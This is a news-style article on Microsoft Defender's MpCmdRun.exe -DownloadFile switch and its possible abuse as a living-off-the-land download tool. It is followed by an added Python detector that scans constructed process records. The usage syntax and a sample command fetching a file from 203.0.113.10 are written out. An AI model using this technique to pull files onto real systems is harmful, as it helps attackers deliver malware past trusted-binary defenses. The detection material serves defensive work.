Microsoft Defender is back in the media spotlight, shortly after the news that it can no longer be disabled through the Windows registry. Microsoft recently added a feature to Defender, but security experts say attackers can use it to download malicious programs.
In version 4.18.2007.9 or 4.18.2009.9 of the Microsoft Defender antimalware platform, Microsoft added the ability to download files from the command line. The usage is as follows:
MpCmdRun.exe -DownloadFile -url <url_to_download> -path <path_to_save_file>
Although the feature itself is not a vulnerability, it turns a trusted, signed Windows binary into a living-off-the-land binary (LOLBIN): anyone with command-line access can use it to fetch additional files from the Internet without bringing their own download tool. Adding this feature to Windows Defender means there is one more application that administrators must keep an eye on, and one more application that attackers can take advantage of.
Askar, a security researcher, says this change to Microsoft Defender's command-line tool could be abused by attackers. In other words, attackers can abuse this binary to download any file from the Internet, including malware.
This also means that users will be able to download any file from the Internet using Microsoft Defender itself. This is unlikely to be a significant security vulnerability, because Windows Defender still scans the file once the download through the command-line tool completes.
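Because the switch is what a detection rule for this LOLBIN would key on, here is an added example (not from the article or from Microsoft) of a small Python detector that scans constructed, Sysmon-style process-creation records for MpCmdRun.exe launched with -DownloadFile and extracts the URL and destination path; the file paths, parent process names, and the 203.0.113.10 address are constructed sample values.

```python
import re

# Constructed sample process-creation records (Sysmon Event ID 1 style); not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2009.9-0\MpCmdRun.exe",
     "CommandLine": r'"MpCmdRun.exe" -DownloadFile -url http://203.0.113.10/update.bin -path "C:\Users\Public\update.bin"',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2009.9-0\MpCmdRun.exe",
     "CommandLine": r'"MpCmdRun.exe" -Scan -ScanType 1',
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c echo -DownloadFile",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# Matches the -DownloadFile switch as a standalone argument, case-insensitively.
DOWNLOAD_SWITCH = re.compile(r"(?i)(?:^|\s)-downloadfile(?:\s|$)")
# Captures "-url <value>" and "-path <value>", with or without surrounding quotes.
FLAG_VALUE = re.compile(r'(?i)-(url|path)\s+(?:"([^"]*)"|(\S+))')


def parse_download(cmdline):
    """Return {'url': ..., 'path': ...} if cmdline uses -DownloadFile, else None."""
    if not DOWNLOAD_SWITCH.search(cmdline):
        return None
    found = {"url": None, "path": None}
    for m in FLAG_VALUE.finditer(cmdline):
        found[m.group(1).lower()] = m.group(2) if m.group(2) is not None else m.group(3)
    return found


def detect(events):
    """One finding per event in which MpCmdRun.exe itself is invoked with -DownloadFile."""
    findings = []
    for ev in events:
        if not ev["Image"].lower().endswith("mpcmdrun.exe"):
            continue  # other processes that merely mention the switch are not Defender downloads
        parsed = parse_download(ev["CommandLine"])
        if parsed:
            findings.append({**parsed, "parent": ev["ParentImage"]})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"Defender download: url={f['url']} path={f['path']} parent={f['parent']}")
```

The parent process and destination path in each finding are what an analyst would triage: a download launched from an interactive shell into a user-writable folder deserves more attention than one started by Defender's own service.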